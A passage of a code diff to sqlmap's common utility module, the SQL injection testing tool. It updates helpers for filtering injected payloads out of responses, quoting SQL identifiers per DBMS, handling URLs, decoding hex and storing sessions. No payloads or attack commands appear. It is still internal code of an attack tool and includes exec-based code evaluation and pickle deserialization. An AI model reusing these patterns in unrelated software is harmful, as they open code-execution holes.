and "sqlmap/1.0-dev (http://sqlmap.org)") + preserve = extractRegexResult(r"%s(?P.+?)%s" % (kb.chars.start, kb.chars.stop), content) + if preserve: + content = content.replace(preserve, REPLACEMENT_MARKER) - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex + if regex != payload: + if all(part.lower() in content.lower() for part in filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check + parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex + # Note: naive approach + retVal = content.replace(payload, REFLECTED_VALUE_MARKER) + retVal = retVal.replace(re.sub(r"\A\w+", "", payload), REFLECTED_VALUE_MARKER) - retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal) + if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs + regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS // 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS // 2:]))) - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) + parts = filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX)) - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) + if regex.startswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) + else: + regex = r"\b%s" % regex - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. 
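# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The reworked
# removeReflectiveValues() above runs the potentially expensive re.sub() in a
# daemon thread and gives up (and disables the reflection-removal mechanism)
# if it has not finished within REFLECTED_REPLACEMENT_TIMEOUT, which guards
# against catastrophic regex backtracking on large responses. The same
# pattern in isolation (names and the 3-second default are the editor's
# choices):

import re
import threading

def sub_with_timeout(pattern, repl, text, timeout=3.0):
    result = [text]                       # mutable cell shared with the worker

    def worker():
        try:
            result[0] = re.sub(pattern, repl, result[0])
        except Exception:
            pass                          # keep the original text on failure

    thread = threading.Thread(target=worker)
    thread.daemon = True                  # never blocks interpreter shutdown
    thread.start()
    thread.join(timeout)

    return text if thread.is_alive() else result[0]

assert sub_with_timeout(r"\d+", "N", "id=123&cat=7") == "id=N&cat=N"
# ---------------------------------------------------------------------------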
Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) + if regex.endswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) + else: + regex = r"%s\b" % regex + + _retVal = [retVal] + + def _thread(regex): + try: + _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + + if len(parts) > 2: + regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) + _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + except KeyboardInterrupt: + raise + except: + pass + + thread = threading.Thread(target=_thread, args=(regex,)) + thread.daemon = True + thread.start() + thread.join(REFLECTED_REPLACEMENT_TIMEOUT) + + if thread.is_alive(): + kb.reflectiveMechanism = False + retVal = content + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of timeouts)" + logger.debug(debugMsg) + else: + retVal = _retVal[0] - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False + if retVal != content: + kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) + warnMsg = "reflective value(s) found and filtering out" + singleTimeWarnMessage(warnMsg) + + if re.search(r"(?i)FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal): + warnMsg = "frames detected containing attacked parameter values. Please be sure to " + warnMsg += "test those separately in case that attack on this page fails" + singleTimeWarnMessage(warnMsg) + + elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: + kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 + if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (for optimization purposes)" + logger.debug(debugMsg) + + if preserve and retVal: + retVal = retVal.replace(REPLACEMENT_MARKER, preserve) + + except (MemoryError, SystemError): + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism" + logger.debug(debugMsg) return retVal -def normalizeUnicode(value): +def normalizeUnicode(value, charset=string.printable[:string.printable.find(' ') + 1]): """ Does an ASCII normalization of unicode strings - Reference: http://www.peterbe.com/plog/unicode-to-ascii + + # Reference: http://www.peterbe.com/plog/unicode-to-ascii + + >>> normalizeUnicode(u'\\u0161u\\u0107uraj') == u'sucuraj' + True + >>> normalizeUnicode(getUnicode(decodeHex("666f6f00626172"))) == u'foobar' + True """ - return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value + retVal = value + + if isinstance(value, six.text_type): + retVal = unicodedata.normalize("NFKD", value) + retVal = "".join(_ for _ in retVal if _ in charset) + + return retVal def safeSQLIdentificatorNaming(name, isTable=False): """ Returns a safe representation of SQL identificator name (internal data format) - Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal + + # Reference: 
http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(safeSQLIdentificatorNaming("begin")) + '[begin]' + >>> getText(safeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() """ retVal = name - if isinstance(name, basestring): + if conf.unsafeNaming: + return retVal + + if isinstance(name, six.string_types): retVal = getUnicode(name) _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) if _: - retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal) - - if not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = "`%s`" % retVal.strip("`") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.DB2): - retVal = "\"%s\"" % retVal.strip("\"") - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): - retVal = "[%s]" % retVal.strip("[]") + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "%s." % DEFAULT_MSSQL_SCHEMA, retVal) + + # Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf) + if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) + if not conf.noEscape: + retVal = unsafeSQLIdentificatorNaming(retVal) + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users) + retVal = "`%s`" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE): + retVal = "\"%s\"" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = "\"%s\"" % retVal.upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + if isTable: + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if parts[i] and (re.search(r"\A\d|[^\w]", parts[i], re.U) or parts[i].upper() in kb.keywords): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) + else: + if re.search(r"\A\d|[^\w]", retVal, re.U) or retVal.upper() in kb.keywords: + retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' 
not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) + if (conf.db or "").lower() != "information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192 + retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) return retVal def unsafeSQLIdentificatorNaming(name): """ Extracts identificator's name from its safe SQL representation + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(unsafeSQLIdentificatorNaming("[begin]")) + 'begin' + >>> getText(unsafeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() """ retVal = name - if isinstance(name, basestring): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): + if isinstance(name, six.string_types): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): retVal = name.replace("`", "") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE): retVal = name.replace("\"", "") - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = name.replace("\"", "").upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): retVal = name.replace("[", "").replace("]", "") if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - prefix = "%s." % DEFAULT_MSSQL_SCHEMA - if retVal.startswith(prefix): - retVal = retVal[len(prefix):] + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "", retVal) return retVal def isNoneValue(value): """ Returns whether the value is unusable (None or '') + + >>> isNoneValue(None) + True + >>> isNoneValue('None') + True + >>> isNoneValue('') + True + >>> isNoneValue([]) + True + >>> isNoneValue([2]) + False """ - if isinstance(value, basestring): + if isinstance(value, six.string_types): return value in ("None", "") elif isListLike(value): return all(isNoneValue(_) for _ in value) @@ -2754,9 +4375,14 @@ def isNoneValue(value): def isNullValue(value): """ Returns whether the value contains explicit 'NULL' value + + >>> isNullValue(u'NULL') + True + >>> isNullValue(u'foobar') + False """ - return isinstance(value, basestring) and value.upper() == NULL + return hasattr(value, "upper") and value.upper() == NULL def expandMnemonics(mnemonics, parser, args): """ @@ -2785,9 +4411,9 @@ def __init__(self): pointer = pointer.next[char] pointer.current.append(option) - for mnemonic in mnemonics.split(','): + for mnemonic in (mnemonics or "").split(','): found = None - name = mnemonic.split('=')[0].replace("-", "").strip() + name = mnemonic.split('=')[0].replace('-', "").strip() value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None pointer = head @@ -2811,17 +4437,21 @@ def __init__(self): if opt.startswith(name): options[opt] = option - if name in options: + if not options: + warnMsg = "mnemonic '%s' can't be resolved" % name + logger.warning(warnMsg) + elif name in options: found = name debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) logger.debug(debugMsg) else: - found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). 
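# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The expanded
# safeSQLIdentificatorNaming()/unsafeSQLIdentificatorNaming() hunks above
# wrap problematic identifiers (keywords, names starting with a digit, names
# with special characters) in DBMS-specific quoting and strip it again on the
# way back: backticks for MySQL-style back ends, double quotes for PostgreSQL
# and friends, square brackets for MSSQL/Sybase. A stripped-down round trip
# over a tiny quote table (the table is the editor's simplification, not
# sqlmap's full DBMS list):

QUOTES = {
    "MySQL": ("`", "`"),
    "PostgreSQL": ('"', '"'),
    "Microsoft SQL Server": ("[", "]"),
}

def quote_identifier(name, dbms):
    left, right = QUOTES[dbms]
    return "%s%s%s" % (left, name, right)

def unquote_identifier(name, dbms):
    left, right = QUOTES[dbms]
    if name.startswith(left) and name.endswith(right):
        return name[len(left):len(name) - len(right)]
    return name

assert quote_identifier("begin", "Microsoft SQL Server") == "[begin]"
assert unquote_identifier("[begin]", "Microsoft SQL Server") == "begin"
assert unquote_identifier("users", "MySQL") == "users"
# ---------------------------------------------------------------------------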
" % (name, ", ".join("'%s'" % key for key in options.keys())) + found = sorted(options.keys(), key=len)[0] + warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options)) warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) + logger.warning(warnMsg) - found = options[found] + if found: + found = options[found] else: found = pointer.current[0] debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) @@ -2844,14 +4474,20 @@ def __init__(self): def safeCSValue(value): """ Returns value safe for CSV dumping - Reference: http://tools.ietf.org/html/rfc4180 + + # Reference: http://tools.ietf.org/html/rfc4180 + + >>> safeCSValue('foo, bar') + '"foo, bar"' + >>> safeCSValue('foobar') + 'foobar' """ retVal = value - if retVal and isinstance(retVal, basestring): + if retVal and isinstance(retVal, six.string_types): if not (retVal[0] == retVal[-1] == '"'): - if any(_ in retVal for _ in (conf.csvDel, '"', '\n')): + if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')): retVal = '"%s"' % retVal.replace('"', '""') return retVal @@ -2859,36 +4495,72 @@ def safeCSValue(value): def filterPairValues(values): """ Returns only list-like values with length 2 + + >>> filterPairValues([[1, 2], [3], 1, [4, 5]]) + [[1, 2], [4, 5]] """ retVal = [] if not isNoneValue(values) and hasattr(values, '__iter__'): - retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values) + retVal = [value for value in values if isinstance(value, (tuple, list, set)) and len(value) == 2] return retVal def randomizeParameterValue(value): """ - Randomize a parameter value based on occurances of alphanumeric characters + Randomize a parameter value based on occurrences of alphanumeric characters + + >>> random.seed(0) + >>> randomizeParameterValue('foobar') + 'fupgpy' + >>> randomizeParameterValue('17') + '36' """ retVal = value - for match in re.finditer('[A-Z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper()) + retVal = re.sub(r"%[0-9a-fA-F]{2}", "", retVal) - for match in re.finditer('[a-z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower()) + def _replace_upper(match): + original = match.group() + while True: + candidate = randomStr(len(original)).upper() + if candidate != original: + return candidate - for match in re.finditer('[0-9]+', value): - retVal = retVal.replace(match.group(), str(randomInt(len(match.group())))) + def _replace_lower(match): + original = match.group() + while True: + candidate = randomStr(len(original)).lower() + if candidate != original: + return candidate + + def _replace_digit(match): + original = match.group() + while True: + candidate = str(randomInt(len(original))) + if candidate != original: + return candidate + + retVal = re.sub(r"[A-Z]+", _replace_upper, retVal) + retVal = re.sub(r"[a-z]+", _replace_lower, retVal) + retVal = re.sub(r"[0-9]+", _replace_digit, retVal) + + if re.match(r"\A[^@]+@.+\.[a-z]+\Z", value): + parts = retVal.split('.') + parts[-1] = random.sample(RANDOMIZATION_TLDS, 1)[0] + retVal = '.'.join(parts) + + if not retVal: + retVal = randomStr(lowercase=True) return retVal +@cachedmethod def asciifyUrl(url, forceQuote=False): """ - Attempts to make a unicode url usuable with ``urllib/urllib2``. + Attempts to make a unicode URL usable with ``urllib/urllib2``. 
More specifically, it attempts to convert the unicode object ``url``, which is meant to represent a IRI, to an unicode object that, @@ -2899,19 +4571,30 @@ def asciifyUrl(url, forceQuote=False): See also RFC 3987. - Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ + # Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ + + >>> asciifyUrl(u'http://www.\\u0161u\\u0107uraj.com') + 'http://www.xn--uuraj-gxa24d.com' """ - parts = urlparse.urlsplit(url) - if not parts.scheme or not parts.netloc: + parts = _urllib.parse.urlsplit(url) + if not all((parts.scheme, parts.netloc, parts.hostname)): # apparently not an url - return url + return getText(url) if all(char in string.printable for char in url): - return url + return getText(url) + + hostname = parts.hostname + + if isinstance(hostname, six.binary_type): + hostname = getUnicode(hostname) # idna-encode domain - hostname = parts.hostname.encode("idna") + try: + hostname = hostname.encode("idna") + except: + hostname = hostname.encode("punycode") # UTF8-quote the other parts. We check each part individually if # if needs to be quoted - that should catch some additional user @@ -2920,10 +4603,10 @@ def asciifyUrl(url, forceQuote=False): def quote(s, safe): s = s or '' # Triggers on non-ascii characters - another option would be: - # urllib.quote(s.replace('%', '')) != s.replace('%', '') + # _urllib.parse.quote(s.replace('%', '')) != s.replace('%', '') # which would trigger on all %-characters, e.g. "&". - if s.encode("ascii", "replace") != s or forceQuote: - return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe) + if getUnicode(s).encode("ascii", "replace") != s or forceQuote: + s = _urllib.parse.quote(getBytes(s), safe=safe) return s username = quote(parts.username, '') @@ -2932,23 +4615,30 @@ def quote(s, safe): query = quote(parts.query, safe="&=") # put everything back together - netloc = hostname + netloc = getText(hostname) if username or password: netloc = '@' + netloc if password: netloc = ':' + password + netloc netloc = username + netloc - if parts.port: - netloc += ':' + str(parts.port) + try: + port = parts.port + except: + port = None + + if port: + netloc += ':' + str(port) - return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) + return getText(_urllib.parse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) or url) def isAdminFromPrivileges(privileges): """ - Inspects privileges to see if those are comming from an admin user + Inspects privileges to see if those are coming from an admin user """ + privileges = privileges or [] + # In PostgreSQL the usesuper privilege means that the # user is DBA retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges) @@ -2967,26 +4657,29 @@ def isAdminFromPrivileges(privileges): # In Firebird there is no specific privilege that means # that the user is DBA - # TODO: confirm retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) return retVal -def findPageForms(content, url, raise_=False, addToTargets=False): +def findPageForms(content, url, raiseException=False, addToTargets=False): """ - Parses given page content for possible forms + Parses given page content for possible forms (Note: still not implemented for Python3) + + >>> findPageForms('
', 'http://www.site.com') == set([('http://www.site.com/input.php', 'POST', 'id=1', None, None)]) + True """ - class _(StringIO): + class _(six.StringIO, object): def __init__(self, content, url): - StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) + super(_, self).__init__(content) self._url = url + def geturl(self): return self._url if not content: errMsg = "can't parse forms as the page content appears to be blank" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -2998,121 +4691,222 @@ def geturl(self): try: forms = ParseResponse(response, backwards_compat=False) except ParseError: - warnMsg = "badly formed HTML at the given url ('%s'). Going to filter it" % url - logger.warning(warnMsg) - response.seek(0) - filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl()) + if re.search(r"(?i)>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php') + True + >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php') + False + """ - return retVal + if not urls: + return None + elif len(urls) == 1: + return True + else: + def _(value): + if value and not re.search(r"\A\w+://", value): + value = "http://%s" % value + return value + + first = _urllib.parse.urlparse(_(urls[0]) or "").hostname or "" + first = re.sub(r"(?i)\Awww\.", "", first) + + for url in urls[1:]: + current = _urllib.parse.urlparse(_(url) or "").hostname or "" + current = re.sub(r"(?i)\Awww\.", "", current) + + if current != first: + return False + + return True def getHostHeader(url): """ Returns proper Host header value for a given target URL + + >>> getHostHeader('http://www.target.com/vuln.php?id=1') + 'www.target.com' """ retVal = url if url: - retVal = urlparse.urlparse(url).netloc + retVal = _urllib.parse.urlparse(url).netloc - if re.search("http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) + if re.search(r"http(s)?://\[.+\]", url, re.I): + retVal = extractRegexResult(r"http(s)?://\[(?P.+)\]", url) elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): retVal = retVal.split(':')[0] + if retVal and retVal.count(':') > 1 and not any(_ in retVal for _ in ('[', ']')): + retVal = "[%s]" % retVal + return retVal -def checkDeprecatedOptions(args): +def checkOldOptions(args): """ - Checks for deprecated options + Checks for obsolete/deprecated options """ for _ in args: - if _ in DEPRECATED_OPTIONS: - errMsg = "switch/option '%s' is deprecated" % _ - if DEPRECATED_OPTIONS[_]: - errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] + _ = _.split('=')[0].strip() + if _ in OBSOLETE_OPTIONS: + errMsg = "switch/option '%s' is obsolete" % _ + if OBSOLETE_OPTIONS[_]: + errMsg += " (hint: %s)" % OBSOLETE_OPTIONS[_] raise SqlmapSyntaxException(errMsg) + elif _ in DEPRECATED_OPTIONS: + warnMsg = "switch/option '%s' is deprecated" % _ + if DEPRECATED_OPTIONS[_]: + warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] + logger.warning(warnMsg) + +def checkSystemEncoding(): + """ + Checks for problematic encodings + """ + + if sys.getdefaultencoding() == "cp720": + try: + codecs.lookup("cp720") + except LookupError: + errMsg = "there is a known Python issue (#1616979) related " + errMsg += "to support for charset 'cp720'. 
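# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The new
# checkSameHost() above decides whether several URLs point at the same target
# by normalizing each one (prepending "http://" when the scheme is missing,
# dropping a leading "www.") and then comparing hostnames. The normalization
# step in isolation (helper name is the editor's choice):

import re
try:
    from urllib.parse import urlparse     # Python 3
except ImportError:
    from urlparse import urlparse         # Python 2

def normalized_host(url):
    if url and not re.search(r"\A\w+://", url):
        url = "http://%s" % url
    host = urlparse(url).hostname or ""
    return re.sub(r"(?i)\Awww\.", "", host)

assert normalized_host("http://www.target.com/page1.php?id=1") == "target.com"
assert normalized_host("target.com/images/page2.php") == "target.com"
assert normalized_host("http://target2.com/") != normalized_host("http://target.com/")
# ---------------------------------------------------------------------------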
Please visit " + errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' " + errMsg += "and follow the instructions to be able to fix it" + logger.critical(errMsg) + + warnMsg = "temporary switching to charset 'cp1256'" + logger.warning(warnMsg) + + _reload_module(sys) + sys.setdefaultencoding("cp1256") def evaluateCode(code, variables=None): """ Executes given python code given in a string form + + >>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"] + 1 """ try: exec(code, variables) except KeyboardInterrupt: raise - except Exception, ex: - errMsg = "an error occured while evaluating provided code ('%s'). " % ex + except Exception as ex: + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): """ Serializes given object + + >>> type(serializeObject([1, 2, 3, ('a', 'b')])) == str + True """ return base64pickle(object_) @@ -3120,6 +4914,11 @@ def serializeObject(object_): def unserializeObject(value): """ Unserializes object from given serialized form + + >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] + True + >>> unserializeObject('gAJVBmZvb2JhcnEBLg==') + 'foobar' """ return base64unpickle(value) if value else None @@ -3141,6 +4940,9 @@ def incrementCounter(technique): def getCounter(technique): """ Returns query counter for a given technique + + >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED) + 1 """ return kb.counters.get(technique, 0) @@ -3148,6 +4950,9 @@ def getCounter(technique): def applyFunctionRecursively(value, function): """ Applies function recursively through list-like structures + + >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0) + [True, True, [True, True, [True]], False] """ if isListLike(value): @@ -3157,26 +4962,58 @@ def applyFunctionRecursively(value, function): return retVal -def decodeHexValue(value): +def decodeDbmsHexValue(value, raw=False): """ Returns value decoded from DBMS specific hexadecimal representation + + >>> decodeDbmsHexValue('3132332031') == u'123 1' + True + >>> decodeDbmsHexValue('31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('00310032003300200031') == u'123 1' + True + >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('313233203') == u'123 ?' 
+ True + >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2'] + True + >>> decodeDbmsHexValue('5.1.41') == u'5.1.41' + True """ retVal = value def _(value): retVal = value - if value and isinstance(value, basestring) and len(value) % 2 == 0: - retVal = hexdecode(retVal) + if value and isinstance(value, six.string_types): + value = value.strip() - if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): - try: - retVal = retVal.decode("utf-16-le") - except UnicodeDecodeError: - pass + if len(value) % 2 != 0: + retVal = (decodeHex(value[:-1]) + b'?') if len(value) > 1 else value + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + else: + retVal = decodeHex(value) + + if not raw: + if not kb.binaryField: + if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): + try: + retVal = retVal.decode("utf-16-le") + except UnicodeDecodeError: + pass - if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2): + try: + retVal = retVal.decode("utf-16-be") + except UnicodeDecodeError: + pass + + if not isinstance(retVal, six.text_type): + retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING) + + if u"\x00" in retVal: + retVal = retVal.replace(u"\x00", u"") return retVal @@ -3190,6 +5027,17 @@ def _(value): def extractExpectedValue(value, expected): """ Extracts and returns expected value by a given type + + >>> extractExpectedValue(['1'], EXPECTED.BOOL) + True + >>> extractExpectedValue(['17'], EXPECTED.BOOL) + True + >>> extractExpectedValue(['0'], EXPECTED.BOOL) + False + >>> extractExpectedValue('1', EXPECTED.INT) + 1 + >>> extractExpectedValue('7\\xb9645', EXPECTED.INT) is None + True """ if expected: @@ -3200,19 +5048,23 @@ def extractExpectedValue(value, expected): elif expected == EXPECTED.BOOL: if isinstance(value, int): value = bool(value) - elif isinstance(value, basestring): + elif isinstance(value, six.string_types): value = value.strip().lower() if value in ("true", "false"): value = value == "true" - elif value in ("1", "-1"): - value = True - elif value == "0": + elif value in ('t', 'f'): + value = value == 't' + elif value == '0': value = False + elif re.search(r"\A-?[1-9]\d*\Z", value): + value = True else: value = None elif expected == EXPECTED.INT: - if isinstance(value, basestring): - value = int(value) if value.isdigit() else None + try: + value = int(value) + except: + value = None return value @@ -3221,19 +5073,25 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - conf.hashDB.write(_, value, serialize) + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): """ Helper function for restoring session data from HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - _ = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any([conf.flushSession, conf.freshQueries])) else None - if not kb.inferenceMode and not kb.fileReadMode and _ and PARTIAL_VALUE_MARKER in _: - _ = None - return _ + retVal = None + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, 
